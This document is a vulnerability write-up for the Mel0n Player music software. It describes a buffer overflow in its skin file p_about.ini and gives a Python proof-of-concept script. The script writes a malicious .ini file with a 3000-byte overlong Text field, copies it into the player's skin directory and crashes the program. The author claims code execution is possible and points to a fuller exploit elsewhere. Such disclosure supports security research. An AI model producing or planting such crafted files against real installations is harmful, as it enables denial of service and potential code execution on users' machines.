Software Description
Mel0n Player is a famous software in Indonesia to play music that are provided by the Melon portal (http://www.melon.co.id). This software can play any music file types such as mp3, wav, wma, mp4, and others. This player can also play the files on your local computer or by online streaming to the portal Melon. The songs can also be downloaded to your local computer.
Vulnerable Information
The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability when opening p_about.ini file (Note: Actually, p_about.ini is a configuration file as part of skin template. This file will bring the program information and can be accessed on the menu (Menu → Information)), as a result of adding extra bytes to parts of the file (Text section), giving the attackers possibility to run an arbitrary code execution on the system that install Melon Player.
This is just the POC, it will just crash the program..
How to reproduce the vulnerability
Just run this code, open MelonPlayer –> Go to Menu –> Information –> Boom!
#!/usr/bin/python
import os,sys,shutil,time
header=("""[MAIN]
MainStyle=SKIN
Resize=NO
Mask=YES
BGStyle=IMAGE
DefSize=0,0,427,136
Image=skin.bmp
Button=2
Slider=
Static=1
Text=4
Edit=
Combo=
[MAINBG]
TopLeft=145,389,6,21
TopCenter=153,389,11,21
TopRight=166,389,6,21
MiddleLeft=145,412,6,21
MiddleCenter=153,412,11,21
MiddleRight=166,412,6,21
BottomLeft=145,435,6,34
BottomCenter=153,435,11,34
BottomRight=166,435,6,34
[MAINMASK]
TopLeft=174,389,10,10
TopCenter=185,389,10,10
TopRight=196,389,10,10
MiddleLeft=185,389,10,10
MiddleCenter=185,389,10,10
MiddleRight=185,389,10,10
BottomLeft=174,400,10,10
BottomCenter=185,389,10,10
BottomRight=196,400,10,10
[BUTTON_1]
Name=??
ID=1001
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=410,4,13,13
NormalRect=223,389,13,13
OverRect=238,389,13,13
DownRect=253,389,13,13
DisabledRect=223,389,13,13
MaskRect=2000,0,13,13
[BUTTON_2]
Name=??
ID=1002
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=173,105,80,20
NormalRect=0,763,80,20
OverRect=0,763,80,20
DownRect=81,763,80,20
DisabledRect=162,763,80,20
MaskRect=2000,0,80,20
[STATIC_1]
Name=???_??
ID=2001
Position=20,31,72,84
TopLeft=14,478,72,84
TopCenter=
TopRight=
MiddleLeft=
MiddleCenter=
MiddleRight=
BottomLeft=
BottomCenter=
BottomRight=
[TEXT_1]
Name=popup Name sdw
ID=3701
Position=2,2,420,14
Text=MelOn Player
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=0,0,0
""")
footer=("""
[TEXT_3]
Name=????
ID=3703
Position=104,50,243,14
Text=Melon Player Version 1.0.0.101102
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0
[TEXT_4]
Name=Copyright
ID=3704
Position=104,72,303,14
Text=Copyright PT. Melon Indonesia. All Right Reserved.
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0
""")
filename="p_about.ini"
splash=os.path.abspath(filename)
skindir="C:Program FilesMelonPlayerIDSkin"
junk = "A" * 3000
buggy=("""
[TEXT_2]
Name=popup Name
ID=3702
Position=3,3,420,14
Text="""+junk+ """
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=170,170,170rn""")
banner=("""
[*] MelOnPlayer 1.0.11.x Denial of Service POC
[*] modpr0be[at]spentera[dot]com.
[*] thanks a lot: cyb3r.anbu | otoy
=====================================================
""")
file=open(filename,'w')
if os.name == 'nt':
if os.path.isdir(skindir):
try:
file.write(header+buggy+footer)
print banner
print "[*] Creating the malicious .ini file.."
time.sleep(2)
print "[*] Malicious file (POC)",filename,"created.."
print "[*] Path:",splash
file.close()
shutil.copy2(splash,skindir)
print "[*] File",filename,"has been copied to",skindir
except IOError:
print "[-] Could not write to destination folder, check permission.."
sys.exit()
else:
print "[-] Could not find Skin directory, is MelOn Player installed?"
sys.exit()
else:
print "[-] Please run this script on Windows."
sys.exit()
Working exploit can be found here:
https://github.com/modpr0be/exploit-dev/tree/master/exploit-repo/melonplayer
